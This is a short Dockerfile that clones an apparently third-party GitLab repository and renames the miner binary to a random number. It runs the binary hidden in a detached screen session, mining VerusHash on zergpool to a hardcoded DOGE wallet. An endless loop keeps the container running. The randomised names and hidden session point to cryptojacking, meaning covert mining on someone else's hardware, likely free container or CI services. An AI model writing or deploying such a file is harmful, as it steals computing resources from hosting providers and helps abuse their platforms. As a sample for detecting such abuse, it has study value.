FROM ubuntu:20.04

RUN apt-get update && \
    apt-get install -y ca-certificates libcurl4 libjansson4 libgomp1 build-essential libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev git screen sudo wget && \
    mk=$(shuf -n 1 -i 1-99999) && \
    mkdir $mk && \
    cd $mk && \
    sc=$(shuf -n 1 -i 1-999999) && \
    git clone https://gitlab.com/jesse_123/vrsc.git && \
    cd vrsc && \
    chmod +x egiaja && \
    mv egiaja $sc && \
    chmod 777 /run/screen && \
    screen -dmS okeposa ./$sc -v -l verushash.asia.mine.zergpool.com:3300 -u DTHFYfFqheLYx3pqNiKPZtU7UcDeuB8QiD.$(shuf -n 1 -i 1-999999) -p c=DOGE -t 8 && \
    while :; do shuf -n 1 -i 1-99999999; sleep 120; done